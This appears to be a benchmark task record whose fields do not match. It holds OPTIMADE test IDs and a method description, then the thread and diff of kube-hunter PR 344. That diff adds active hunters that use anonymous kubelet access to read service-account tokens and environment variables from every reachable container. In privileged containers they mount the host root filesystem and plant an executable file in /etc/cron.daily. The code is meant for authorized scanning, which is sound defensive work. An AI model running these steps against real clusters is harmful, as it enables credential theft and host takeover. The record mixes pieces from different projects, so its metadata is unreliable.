"tests/server/test_client.py::test_client_global_data_callback[True]", "tests/server/test_client.py::test_client_global_data_callback[False]", "tests/server/test_client.py::test_client_page_skip_callback[True]", "tests/server/test_client.py::test_client_page_skip_callback[False]", "tests/server/test_client.py::test_client_mutable_data_callback[True]", "tests/server/test_client.py::test_client_mutable_data_callback[False]", "tests/server/test_client.py::test_client_asynchronous_write_callback[True]", "tests/server/test_client.py::test_client_asynchronous_write_callback[False]", "tests/server/test_client.py::test_binary_search_internals[1_0]", "tests/server/test_client.py::test_binary_search_internals[2_0]", "tests/server/test_client.py::test_binary_search_internals[1_1]", "tests/server/test_client.py::test_binary_search_internals[1_2]", "tests/server/test_client.py::test_binary_search_internals[1_3]", "tests/server/test_client.py::test_binary_search_internals[2_1]", "tests/server/test_client.py::test_binary_search_internals[2_2]", "tests/server/test_client.py::test_binary_search_internals[3]", "tests/server/test_client.py::test_binary_search_internals[4]", "tests/server/test_client.py::test_binary_search_internals[5]", "tests/server/test_client.py::test_binary_search_internals[6]", "tests/server/test_client.py::test_binary_search_internals[7]", "tests/server/test_client.py::test_binary_search_internals[9]", "tests/server/test_client.py::test_binary_search_internals[12]", "tests/server/test_client.py::test_binary_search_internals[14]", "tests/server/test_client.py::test_binary_search_internals[18]", "tests/server/test_client.py::test_binary_search_internals[22]", "tests/server/test_client.py::test_binary_search_internals[27]", "tests/server/test_client.py::test_binary_search_internals[33]", "tests/server/test_client.py::test_binary_search_internals[41]", "tests/server/test_client.py::test_binary_search_internals[51]", "tests/server/test_client.py::test_binary_search_internals[63]", "tests/server/test_client.py::test_binary_search_internals[77]", "tests/server/test_client.py::test_binary_search_internals[95]", "tests/server/test_client.py::test_binary_search_internals[117]", "tests/server/test_client.py::test_binary_search_internals[144]", "tests/server/test_client.py::test_binary_search_internals[177]", "tests/server/test_client.py::test_binary_search_internals[218]", "tests/server/test_client.py::test_binary_search_internals[269]", "tests/server/test_client.py::test_binary_search_internals[331]", "tests/server/test_client.py::test_binary_search_internals[407]", "tests/server/test_client.py::test_binary_search_internals[501]", "tests/server/test_client.py::test_binary_search_internals[616]", "tests/server/test_client.py::test_binary_search_internals[758]", "tests/server/test_client.py::test_binary_search_internals[933]", "tests/server/test_client.py::test_binary_search_internals[1148]", "tests/server/test_client.py::test_binary_search_internals[1412]", "tests/server/test_client.py::test_binary_search_internals[1737]", "tests/server/test_client.py::test_binary_search_internals[2137]", "tests/server/test_client.py::test_binary_search_internals[2630]", "tests/server/test_client.py::test_binary_search_internals[3235]", "tests/server/test_client.py::test_binary_search_internals[3981]", "tests/server/test_client.py::test_binary_search_internals[4897]", "tests/server/test_client.py::test_binary_search_internals[6025]", "tests/server/test_client.py::test_binary_search_internals[7413]", "tests/server/test_client.py::test_binary_search_internals[9120]", "tests/server/test_client.py::test_binary_search_internals[11220]", "tests/server/test_client.py::test_binary_search_internals[13803]", "tests/server/test_client.py::test_binary_search_internals[16982]", "tests/server/test_client.py::test_binary_search_internals[20892]", "tests/server/test_client.py::test_binary_search_internals[25703]", "tests/server/test_client.py::test_binary_search_internals[31622]", "tests/server/test_client.py::test_binary_search_internals[38904]", "tests/server/test_client.py::test_binary_search_internals[47863]", "tests/server/test_client.py::test_binary_search_internals[58884]", "tests/server/test_client.py::test_binary_search_internals[72443]", "tests/server/test_client.py::test_binary_search_internals[89125]", "tests/server/test_client.py::test_binary_search_internals[109647]", "tests/server/test_client.py::test_binary_search_internals[134896]", "tests/server/test_client.py::test_binary_search_internals[165958]", "tests/server/test_client.py::test_binary_search_internals[204173]", "tests/server/test_client.py::test_binary_search_internals[251188]", "tests/server/test_client.py::test_binary_search_internals[309029]", "tests/server/test_client.py::test_binary_search_internals[380189]", "tests/server/test_client.py::test_binary_search_internals[467735]", "tests/server/test_client.py::test_binary_search_internals[575439]", "tests/server/test_client.py::test_binary_search_internals[707945]", "tests/server/test_client.py::test_binary_search_internals[870963]", "tests/server/test_client.py::test_binary_search_internals[1071519]", "tests/server/test_client.py::test_binary_search_internals[1318256]", "tests/server/test_client.py::test_binary_search_internals[1621810]", "tests/server/test_client.py::test_binary_search_internals[1995262]", "tests/server/test_client.py::test_binary_search_internals[2454708]", "tests/server/test_client.py::test_binary_search_internals[3019951]", "tests/server/test_client.py::test_binary_search_internals[3715352]", "tests/server/test_client.py::test_binary_search_internals[4570881]", "tests/server/test_client.py::test_binary_search_internals[5623413]", "tests/server/test_client.py::test_binary_search_internals[6918309]", "tests/server/test_client.py::test_binary_search_internals[8511380]", "tests/server/test_client.py::test_binary_search_internals[10471285]", "tests/server/test_client.py::test_binary_search_internals[12882495]", "tests/server/test_client.py::test_binary_search_internals[15848931]", "tests/server/test_client.py::test_binary_search_internals[19498445]", "tests/server/test_client.py::test_binary_search_internals[23988329]", "tests/server/test_client.py::test_binary_search_internals[29512092]", "tests/server/test_client.py::test_binary_search_internals[36307805]", "tests/server/test_client.py::test_binary_search_internals[44668359]", "tests/server/test_client.py::test_binary_search_internals[54954087]", "tests/server/test_client.py::test_binary_search_internals[67608297]", "tests/server/test_client.py::test_binary_search_internals[83176377]", "tests/server/test_client.py::test_binary_search_internals[102329299]", "tests/server/test_client.py::test_binary_search_internals[125892541]", "tests/server/test_client.py::test_binary_search_internals[154881661]", "tests/server/test_client.py::test_binary_search_internals[190546071]", "tests/server/test_client.py::test_binary_search_internals[234422881]", "tests/server/test_client.py::test_binary_search_internals[288403150]", "tests/server/test_client.py::test_binary_search_internals[354813389]", "tests/server/test_client.py::test_binary_search_internals[436515832]", "tests/server/test_client.py::test_binary_search_internals[537031796]", "tests/server/test_client.py::test_binary_search_internals[660693448]", "tests/server/test_client.py::test_binary_search_internals[812830516]", "tests/server/test_client.py::test_binary_search_internals[1000000000]", "tests/server/test_client.py::test_raw_get_one_sync", "tests/server/test_client.py::test_raw_get_one_async" ]
Method: StructureResourceAttributes.check_symmetry_operations(self) Location: optimade/models/structures.py Inputs: - self: an instance of StructureResourceAttributes containing • nperiodic_dimensions (int) • space_group_symmetry_operations_xyz (list[SymmetryOperation] | None) Outputs: Returns the same instance (self). Raises ValueError with a specific message when: - nperiodic_dimensions == 0 and space_group_symmetry_operations_xyz is not None, or - space_group_symmetry_operations_xyz is provided but does not include the required identity operation "x,y,z". Description: Model‑level validator that enforces OPTIMADE 1.2 rules for the newly added `space_group_symmetry_operations_xyz` field, ensuring it is omitted for non‑periodic structures and that the mandatory identity symmetry operation is present when the list is supplied.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/adapters/structures/test_structures.py tests/models/test_structures.py tests/server/test_client.py" }
{ "num_modified_files": 4, "num_modified_lines": 77, "pr_author": "ml-evs", "pr_labels": [ "schema: Concerns the schema models", "OPTIMADE v1.2: This label describes actions that have to be taken to be complient with OPTIMADE 1.2" ], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.86, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue asks to add support for the OPTIMADE 1.2 field `space_group_symmetry_operations_xyz`. The test patch defines the required model field, validation rules (identity operation required, pattern enforcement, disallow for non‑periodic structures), JSON fixtures, and OpenAPI updates. While the tests align with the intended behavior, the original issue text provides no acceptance criteria, making the specification ambiguous. This signals a primary B4 (ambiguous specification) problem.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
d6ca66644751d6df2dd0ed3591e63402186cd710
2020-04-24 14:12:02
abdullahgarcia: Please, review accordingly iYehuda: Hi @abdullahgarcia, thanks for your contribution! It might take us some time to review since it's not a little PR. abdullahgarcia: Hi @iYehuda, No worries. Please, let me know if you need any assistance or you have further doubts. Thanks! Abdullah abdullahgarcia: Hi @iYehuda, Just following up. Thanks! Abdullah lizrice: Hi @abdullahgarcia! I started looking at this but got waylaid by some other issues in active hunters. Thanks for the reminder :-) codecov-io: # [Codecov](https://codecov.io/gh/aquasecurity/kube-hunter/pull/344?src=pr&el=h1) Report > Merging [#344](https://codecov.io/gh/aquasecurity/kube-hunter/pull/344?src=pr&el=desc) into [master](https://codecov.io/gh/aquasecurity/kube-hunter/commit/a0127659b7d9d35bca23fa4436788316058249d9&el=desc) will **increase** coverage by `3.64%`. > The diff coverage is `95.34%`. [![Impacted file tree graph](https://codecov.io/gh/aquasecurity/kube-hunter/pull/344/graphs/tree.svg?width=650&height=150&src=pr&token=hXSGvlUpkI)](https://codecov.io/gh/aquasecurity/kube-hunter/pull/344?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #344 +/- ## ========================================== + Coverage 57.68% 61.32% +3.64% ========================================== Files 40 40 Lines 2037 2252 +215 ========================================== + Hits 1175 1381 +206 - Misses 862 871 +9 ``` | [Impacted Files](https://codecov.io/gh/aquasecurity/kube-hunter/pull/344?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [kube\_hunter/modules/hunting/kubelet.py](https://codecov.io/gh/aquasecurity/kube-hunter/pull/344/diff?src=pr&el=tree#diff-a3ViZV9odW50ZXIvbW9kdWxlcy9odW50aW5nL2t1YmVsZXQucHk=) | `59.38% <95.34%> (+28.47%)` | :arrow_up: | ------ [Continue to review full report at Codecov](https://codecov.io/gh/aquasecurity/kube-hunter/pull/344?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/aquasecurity/kube-hunter/pull/344?src=pr&el=footer). Last update [a012765...4b31c1e](https://codecov.io/gh/aquasecurity/kube-hunter/pull/344?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments). abdullahgarcia: Hi @lizrice, Just following up. Thanks! Abdullah abdullahgarcia: > Hi @lizrice, > > Just following up. > > Thanks! > > Abdullah abdullahgarcia: Hi @lizrice, Just checking if it would be easier to go together over the changes. Thanks! lizrice: So many apologies @abdullahgarcia. I started testing this out, got distracted by finding #350 and then other things got in the way! We are looking at it now, thank you for highlighting this in yesterday's call. abdullahgarcia: Hi @danielsagi, Just following up after the changes. Thanks! Abdullah danielsagi: Hi @abdullahgarcia , Thanks for the ping. We're just doing some tests on our side to make sure everythings as expected, I believe that in the next few days this will be done. I will update you. abdullahgarcia: Hi @danielsagi, I've addressed your comments. Please, let me know if anything else is required. Thanks again! Abdullah lizrice: Thanks again for this @abdullahgarcia, and for your patience!
aquasecurity__kube-hunter-344
diff --git a/docs/_kb/KHV051.md b/docs/_kb/KHV051.md new file mode 100644 index 0000000..b09de24 --- /dev/null +++ b/docs/_kb/KHV051.md @@ -0,0 +1,40 @@ +--- +vid: KHV051 +title: Exposed Existing Privileged Containers Via Secure Kubelet Port +categories: [Access Risk] +--- + +# {{ page.vid }} - {{ page.title }} + +## Issue description + +The kubelet is configured to allow anonymous (unauthenticated) requests to its HTTPs API. This may expose certain information and capabilities to an attacker with access to the kubelet API. + +A privileged container is given access to all devices on the host and can work at the kernel level. It is declared using the `Pod.spec.containers[].securityContext.privileged` attribute. This may be useful for infrastructure containers that perform setup work on the host, but is a dangerous attack vector. + +Furthermore, if the kubelet **and** the API server authentication mechanisms are (mis)configured such that anonymous requests can execute commands via the API within the containers (specifically privileged ones), a malicious actor can leverage such capabilities to do way more damage in the cluster than expected: e.g. start/modify process on host. + +## Remediation + +Ensure kubelet is protected using `--anonymous-auth=false` kubelet flag. Allow only legitimate users using `--client-ca-file` or `--authentication-token-webhook` kubelet flags. This is usually done by the installer or cloud provider. + +Minimize the use of privileged containers. + +Use Pod Security Policies to enforce using `privileged: false` policy. + +Review the RBAC permissions to Kubernetes API server for the anonymous and default service account, including bindings. + +Ensure node(s) runs active filesystem monitoring. + +Set `--insecure-port=0` and remove `--insecure-bind-address=0.0.0.0` in the Kubernetes API server config. + +Remove `AlwaysAllow` from `--authorization-mode` in the Kubernetes API server config. Alternatively, set `--anonymous-auth=false` in the Kubernetes API server config; this will depend on the API server version running. + +## References + +- [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/) +- [Privileged mode for pod containers](https://kubernetes.io/docs/concepts/workloads/pods/pod/#privileged-mode-for-pod-containers) +- [Pod Security Policies - Privileged](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privileged) +- [Using RBAC Authorization](https://kubernetes.io/docs/reference/access-authn-authz/rbac/) +- [KHV005 - Access to Kubernetes API]({{ site.baseurl }}{% link _kb/KHV005.md %}) +- [KHV036 - Anonymous Authentication]({{ site.baseurl }}{% link _kb/KHV036.md %}) diff --git a/kube_hunter/modules/hunting/kubelet.py b/kube_hunter/modules/hunting/kubelet.py index 05f9dfa..cd02192 100644 --- a/kube_hunter/modules/hunting/kubelet.py +++ b/kube_hunter/modules/hunting/kubelet.py @@ -1,10 +1,12 @@ import json import logging +import time from enum import Enum import re import requests import urllib3 +import uuid from kube_hunter.conf import get_config from kube_hunter.core.events import handler @@ -119,6 +121,22 @@ class ExposedHealthzHandler(Vulnerability, Event): self.evidence = f"status: {self.status}" +class ExposedExistingPrivilegedContainersViaSecureKubeletPort(Vulnerability, Event): + """A malicious actor, that has confirmed anonymous access to the API via the kubelet's secure port, \ +can leverage the existing privileged containers identified to damage the host and potentially \ +the whole cluster""" + + def __init__(self, exposed_existing_privileged_containers): + Vulnerability.__init__( + self, + component=KubernetesCluster, + name="Exposed Existing Privileged Container(s) Via Secure Kubelet Port", + category=AccessRisk, + vid="KHV051", + ) + self.exposed_existing_privileged_containers = exposed_existing_privileged_containers + + class PrivilegedContainers(Vulnerability, Event): """A Privileged container exist on a node could expose the node/cluster to unwanted root operations""" @@ -434,6 +452,520 @@ class SecureKubeletPortHunter(Hunter): } +""" Active Hunters """ + + +@handler.subscribe(AnonymousAuthEnabled) +class ProveAnonymousAuth(ActiveHunter): + """Foothold Via Secure Kubelet Port + Attempts to demonstrate that a malicious actor can establish foothold into the cluster via a + container abusing the configuration of the kubelet's secure port: authentication-auth=false. + """ + + def __init__(self, event): + self.event = event + self.base_url = "https://{host}:10250/".format(host=self.event.host) + + def get_request(self, url, verify=False): + config = get_config() + try: + response_text = self.event.session.get(url=url, verify=verify, timeout=config.network_timeout).text.rstrip() + + return response_text + except Exception as ex: + logging.debug("Exception: " + str(ex)) + return "Exception: " + str(ex) + + def post_request(self, url, params, verify=False): + config = get_config() + try: + response_text = self.event.session.post( + url=url, verify=verify, params=params, timeout=config.network_timeout + ).text.rstrip() + + return response_text + except Exception as ex: + logging.debug("Exception: " + str(ex)) + return "Exception: " + str(ex) + + @staticmethod + def has_no_exception(result): + return "Exception: " not in result + + @staticmethod + def has_no_error(result): + possible_errors = ["exited with", "Operation not permitted", "Permission denied", "No such file or directory"] + + return not any(error in result for error in possible_errors) + + @staticmethod + def has_no_error_nor_exception(result): + return ProveAnonymousAuth.has_no_error(result) and ProveAnonymousAuth.has_no_exception(result) + + def cat_command(self, run_request_url, full_file_path): + return self.post_request(run_request_url, {"cmd": "cat {}".format(full_file_path)}) + + def process_container(self, run_request_url): + service_account_token = self.cat_command(run_request_url, "/var/run/secrets/kubernetes.io/serviceaccount/token") + + environment_variables = self.post_request(run_request_url, {"cmd": "env"}) + + if self.has_no_error_nor_exception(service_account_token): + return { + "result": True, + "service_account_token": service_account_token, + "environment_variables": environment_variables, + } + + return {"result": False} + + def execute(self): + pods_raw = self.get_request(self.base_url + KubeletHandlers.PODS.value) + + # At this point, the following must happen: + # a) we get the data of the running pods + # b) we get a forbidden message because the API server + # has a configuration that denies anonymous attempts despite the kubelet being vulnerable + + if self.has_no_error_nor_exception(pods_raw) and "items" in pods_raw: + pods_data = json.loads(pods_raw)["items"] + + temp_message = "" + exposed_existing_privileged_containers = list() + + for pod_data in pods_data: + pod_namespace = pod_data["metadata"]["namespace"] + pod_id = pod_data["metadata"]["name"] + + for container_data in pod_data["spec"]["containers"]: + container_name = container_data["name"] + + run_request_url = self.base_url + "run/{}/{}/{}".format(pod_namespace, pod_id, container_name) + + extracted_data = self.process_container(run_request_url) + + if extracted_data["result"]: + service_account_token = extracted_data["service_account_token"] + environment_variables = extracted_data["environment_variables"] + + temp_message += ( + "\n\nPod namespace: {}".format(pod_namespace) + + "\n\nPod ID: {}".format(pod_id) + + "\n\nContainer name: {}".format(container_name) + + "\n\nService account token: {}".format(service_account_token) + + "\nEnvironment variables: {}".format(environment_variables) + ) + + first_check = container_data.get("securityContext", {}).get("privileged") + + first_subset = container_data.get("securityContext", {}) + second_subset = first_subset.get("capabilities", {}) + data_for_second_check = second_subset.get("add", []) + + second_check = "SYS_ADMIN" in data_for_second_check + + if first_check or second_check: + exposed_existing_privileged_containers.append( + { + "pod_namespace": pod_namespace, + "pod_id": pod_id, + "container_name": container_name, + "service_account_token": service_account_token, + "environment_variables": environment_variables, + } + ) + + if temp_message: + message = "The following containers have been successfully breached." + temp_message + + self.event.evidence = "{}".format(message) + + if exposed_existing_privileged_containers: + self.publish_event( + ExposedExistingPrivilegedContainersViaSecureKubeletPort( + exposed_existing_privileged_containers=exposed_existing_privileged_containers + ) + ) + + +@handler.subscribe(ExposedExistingPrivilegedContainersViaSecureKubeletPort) +class MaliciousIntentViaSecureKubeletPort(ActiveHunter): + """Malicious Intent Via Secure Kubelet Port + Attempts to demonstrate that a malicious actor can leverage existing privileged containers + exposed via the kubelet's secure port, due to anonymous auth enabled misconfiguration, + such that a process can be started or modified on the host. + """ + + def __init__(self, event, seconds_to_wait_for_os_command=1): + self.event = event + self.base_url = "https://{host}:10250/".format(host=self.event.host) + self.seconds_to_wait_for_os_command = seconds_to_wait_for_os_command + self.number_of_rm_attempts = 5 + self.number_of_rmdir_attempts = 5 + self.number_of_umount_attempts = 5 + + def post_request(self, url, params, verify=False): + config = get_config() + try: + response_text = self.event.session.post( + url, verify, params=params, timeout=config.network_timeout + ).text.rstrip() + + return response_text + except Exception as ex: + logging.debug("Exception: " + str(ex)) + return "Exception: " + str(ex) + + def cat_command(self, run_request_url, full_file_path): + return self.post_request(run_request_url, {"cmd": "cat {}".format(full_file_path)}) + + def clean_attacked_exposed_existing_privileged_container( + self, + run_request_url, + file_system_or_partition, + directory_created, + file_created, + number_of_rm_attempts, + number_of_umount_attempts, + number_of_rmdir_attempts, + seconds_to_wait_for_os_command, + ): + + self.rm_command( + run_request_url, + "{}/etc/cron.daily/{}".format(directory_created, file_created), + number_of_rm_attempts, + seconds_to_wait_for_os_command, + ) + + self.umount_command( + run_request_url, + file_system_or_partition, + directory_created, + number_of_umount_attempts, + seconds_to_wait_for_os_command, + ) + + self.rmdir_command( + run_request_url, directory_created, number_of_rmdir_attempts, seconds_to_wait_for_os_command, + ) + + def check_file_exists(self, run_request_url, file): + file_exists = self.ls_command(run_request_url=run_request_url, file_or_directory=file) + + return ProveAnonymousAuth.has_no_error_nor_exception(file_exists) + + def rm_command(self, run_request_url, file_to_remove, number_of_rm_attempts, seconds_to_wait_for_os_command): + if self.check_file_exists(run_request_url, file_to_remove): + for _ in range(number_of_rm_attempts): + command_execution_outcome = self.post_request( + run_request_url, {"cmd": "rm -f {}".format(file_to_remove)} + ) + + if seconds_to_wait_for_os_command: + time.sleep(seconds_to_wait_for_os_command) + + first_check = ProveAnonymousAuth.has_no_error_nor_exception(command_execution_outcome) + second_check = self.check_file_exists(run_request_url, file_to_remove) + + if first_check and not second_check: + return True + + pod_id = run_request_url.replace(self.base_url + "run/", "").split("/")[1] + container_name = run_request_url.replace(self.base_url + "run/", "").split("/")[2] + logger.warning( + "kube-hunter: " + + "POD=" + + pod_id + + ", " + + "CONTAINER=" + + container_name + + " - Unable to remove file: " + + file_to_remove + ) + + return False + + def chmod_command(self, run_request_url, permissions, file): + return self.post_request(run_request_url, {"cmd": "chmod {} {}".format(permissions, file)}) + + def touch_command(self, run_request_url, file_to_create): + return self.post_request(run_request_url, {"cmd": "touch {}".format(file_to_create)}) + + def attack_exposed_existing_privileged_container( + self, run_request_url, directory_created, number_of_rm_attempts, seconds_to_wait_for_os_command, file_name=None + ): + if file_name is None: + file_name = "kube-hunter" + str(uuid.uuid1()) + + file_name_with_path = "{}/etc/cron.daily/{}".format(directory_created, file_name) + + file_created = self.touch_command(run_request_url, file_name_with_path) + + if ProveAnonymousAuth.has_no_error_nor_exception(file_created): + permissions_changed = self.chmod_command(run_request_url, "755", file_name_with_path) + + if ProveAnonymousAuth.has_no_error_nor_exception(permissions_changed): + return {"result": True, "file_created": file_name} + + self.rm_command(run_request_url, file_name_with_path, number_of_rm_attempts, seconds_to_wait_for_os_command) + + return {"result": False} + + def check_directory_exists(self, run_request_url, directory): + directory_exists = self.ls_command(run_request_url=run_request_url, file_or_directory=directory) + + return ProveAnonymousAuth.has_no_error_nor_exception(directory_exists) + + def rmdir_command( + self, run_request_url, directory_to_remove, number_of_rmdir_attempts, seconds_to_wait_for_os_command, + ): + if self.check_directory_exists(run_request_url, directory_to_remove): + for _ in range(number_of_rmdir_attempts): + command_execution_outcome = self.post_request( + run_request_url, {"cmd": "rmdir {}".format(directory_to_remove)} + ) + + if seconds_to_wait_for_os_command: + time.sleep(seconds_to_wait_for_os_command) + + first_check = ProveAnonymousAuth.has_no_error_nor_exception(command_execution_outcome) + second_check = self.check_directory_exists(run_request_url, directory_to_remove) + + if first_check and not second_check: + return True + + pod_id = run_request_url.replace(self.base_url + "run/", "").split("/")[1] + container_name = run_request_url.replace(self.base_url + "run/", "").split("/")[2] + logger.warning( + "kube-hunter: " + + "POD=" + + pod_id + + ", " + + "CONTAINER=" + + container_name + + " - Unable to remove directory: " + + directory_to_remove + ) + + return False + + def ls_command(self, run_request_url, file_or_directory): + return self.post_request(run_request_url, {"cmd": "ls {}".format(file_or_directory)}) + + def umount_command( + self, + run_request_url, + file_system_or_partition, + directory, + number_of_umount_attempts, + seconds_to_wait_for_os_command, + ): + # Note: the logic implemented proved more reliable than using "df" + # command to resolve for mounted systems/partitions. + current_files_and_directories = self.ls_command(run_request_url, directory) + + if self.ls_command(run_request_url, directory) == current_files_and_directories: + for _ in range(number_of_umount_attempts): + # Ref: http://man7.org/linux/man-pages/man2/umount.2.html + command_execution_outcome = self.post_request( + run_request_url, {"cmd": "umount {} {}".format(file_system_or_partition, directory)} + ) + + if seconds_to_wait_for_os_command: + time.sleep(seconds_to_wait_for_os_command) + + first_check = ProveAnonymousAuth.has_no_error_nor_exception(command_execution_outcome) + second_check = self.ls_command(run_request_url, directory) != current_files_and_directories + + if first_check and second_check: + return True + + pod_id = run_request_url.replace(self.base_url + "run/", "").split("/")[1] + container_name = run_request_url.replace(self.base_url + "run/", "").split("/")[2] + logger.warning( + "kube-hunter: " + + "POD=" + + pod_id + + ", " + + "CONTAINER=" + + container_name + + " - Unable to unmount " + + file_system_or_partition + + " at: " + + directory + ) + + return False + + def mount_command(self, run_request_url, file_system_or_partition, directory): + # Ref: http://man7.org/linux/man-pages/man1/mkdir.1.html + return self.post_request(run_request_url, {"cmd": "mount {} {}".format(file_system_or_partition, directory)}) + + def mkdir_command(self, run_request_url, directory_to_create): + # Ref: http://man7.org/linux/man-pages/man1/mkdir.1.html + return self.post_request(run_request_url, {"cmd": "mkdir {}".format(directory_to_create)}) + + def findfs_command(self, run_request_url, file_system_or_partition_type, file_system_or_partition): + # Ref: http://man7.org/linux/man-pages/man8/findfs.8.html + return self.post_request( + run_request_url, {"cmd": "findfs {}{}".format(file_system_or_partition_type, file_system_or_partition)} + ) + + def get_root_values(self, command_line): + for command in command_line.split(" "): + # Check for variable-definition commands as there can be commands which don't define variables. + if "=" in command: + split = command.split("=") + if split[0] == "root": + if len(split) > 2: + # Potential valid scenario: root=LABEL=example + root_value_type = split[1] + "=" + root_value = split[2] + + return root_value, root_value_type + else: + root_value_type = "" + root_value = split[1] + + return root_value, root_value_type + + return None, None + + def process_exposed_existing_privileged_container( + self, + run_request_url, + number_of_umount_attempts, + number_of_rmdir_attempts, + seconds_to_wait_for_os_command, + directory_to_create=None, + ): + if directory_to_create is None: + directory_to_create = "/kube-hunter_" + str(uuid.uuid1()) + + # /proc/cmdline - This file shows the parameters passed to the kernel at the time it is started. + command_line = self.cat_command(run_request_url, "/proc/cmdline") + + if ProveAnonymousAuth.has_no_error_nor_exception(command_line): + if len(command_line.split(" ")) > 0: + root_value, root_value_type = self.get_root_values(command_line) + + # Move forward only when the "root" variable value was actually defined. + if root_value: + if root_value_type: + file_system_or_partition = self.findfs_command(run_request_url, root_value_type, root_value) + else: + file_system_or_partition = root_value + + if ProveAnonymousAuth.has_no_error_nor_exception(file_system_or_partition): + directory_created = self.mkdir_command(run_request_url, directory_to_create) + + if ProveAnonymousAuth.has_no_error_nor_exception(directory_created): + directory_created = directory_to_create + + mounted_file_system_or_partition = self.mount_command( + run_request_url, file_system_or_partition, directory_created + ) + + if ProveAnonymousAuth.has_no_error_nor_exception(mounted_file_system_or_partition): + host_name = self.cat_command( + run_request_url, "{}/etc/hostname".format(directory_created) + ) + + if ProveAnonymousAuth.has_no_error_nor_exception(host_name): + return { + "result": True, + "file_system_or_partition": file_system_or_partition, + "directory_created": directory_created, + } + + self.umount_command( + run_request_url, + file_system_or_partition, + directory_created, + number_of_umount_attempts, + seconds_to_wait_for_os_command, + ) + + self.rmdir_command( + run_request_url, + directory_created, + number_of_rmdir_attempts, + seconds_to_wait_for_os_command, + ) + + return {"result": False} + + def execute(self, directory_to_create=None, file_name=None): + temp_message = "" + + for exposed_existing_privileged_containers in self.event.exposed_existing_privileged_containers: + pod_namespace = exposed_existing_privileged_containers["pod_namespace"] + pod_id = exposed_existing_privileged_containers["pod_id"] + container_name = exposed_existing_privileged_containers["container_name"] + + run_request_url = self.base_url + "run/{}/{}/{}".format(pod_namespace, pod_id, container_name) + + is_exposed_existing_privileged_container_privileged = self.process_exposed_existing_privileged_container( + run_request_url, + self.number_of_umount_attempts, + self.number_of_rmdir_attempts, + self.seconds_to_wait_for_os_command, + directory_to_create, + ) + + if is_exposed_existing_privileged_container_privileged["result"]: + file_system_or_partition = is_exposed_existing_privileged_container_privileged[ + "file_system_or_partition" + ] + directory_created = is_exposed_existing_privileged_container_privileged["directory_created"] + + # Execute attack attempt: start/modify process in host. + attack_successful_on_exposed_privileged_container = self.attack_exposed_existing_privileged_container( + run_request_url, + directory_created, + self.number_of_rm_attempts, + self.seconds_to_wait_for_os_command, + file_name, + ) + + if attack_successful_on_exposed_privileged_container["result"]: + file_created = attack_successful_on_exposed_privileged_container["file_created"] + + self.clean_attacked_exposed_existing_privileged_container( + run_request_url, + file_system_or_partition, + directory_created, + file_created, + self.number_of_rm_attempts, + self.number_of_umount_attempts, + self.number_of_rmdir_attempts, + self.seconds_to_wait_for_os_command, + ) + + temp_message += "\n\nPod namespace: {}\n\nPod ID: {}\n\nContainer name: {}".format( + pod_namespace, pod_id, container_name + ) + + if temp_message: + message = ( + "The following exposed existing privileged containers" + + " have been successfully abused by starting/modifying a process in the host." + + temp_message + ) + + self.event.evidence = "{}".format(message) + else: + message = ( + "The following exposed existing privileged containers" + + " were not successfully abused by starting/modifying a process in the host." + + "Keep in mind that attackers might use other methods to attempt to abuse them." + + temp_message + ) + + self.event.evidence = "{}".format(message) + + @handler.subscribe(ExposedRunHandler) class ProveRunHandler(ActiveHunter): """Kubelet Run Hunter diff --git a/requirements-dev.txt b/requirements-dev.txt index 1c42d0a..f6f69a7 100644 --- a/requirements-dev.txt +++ b/requirements-dev.txt @@ -2,7 +2,7 @@ flake8 pytest >= 2.9.1 -requests-mock +requests-mock >= 1.8 coverage < 5.0 pytest-cov setuptools >= 30.3.0
Two new kubelet active hunters. <!--- Thank you for contributing to Aqua Security. Please don't remove the template. --> ## Description I'm introducing two new active hunters: - FootholdViaSecureKubeletPort - MaliciousIntentViaSecureKubeletPort Both active hunters enable a deeper analysis on how malicious actors could benefit of a mis-configured secure kubelet port. ## Contribution Guidelines Please Read through the [Contribution Guidelines](https://github.com/aquasecurity/kube-hunter/blob/master/CONTRIBUTING.md). ## Fixed Issues Please mention any issues fixed in the PR by referencing it properly in the commit message. As per the convention, use appropriate keywords such as `fixes`, `closes`, `resolves` to automatically refer the issue. Please consult [official github documentation](https://help.github.com/en/github/managing-your-work-on-github/closing-issues-using-keywords) for details. Fixes #(issue) ## "BEFORE" and "AFTER" output To verify that the change works as desired, please include an output of terminal before and after the changes under headings "BEFORE" and "AFTER". ### BEFORE Any Terminal Output Before Changes. ### AFTER Any Terminal Output Before Changes. ## Contribution checklist - [x] I have read the Contributing Guidelines. - [ ] The commits refer to an 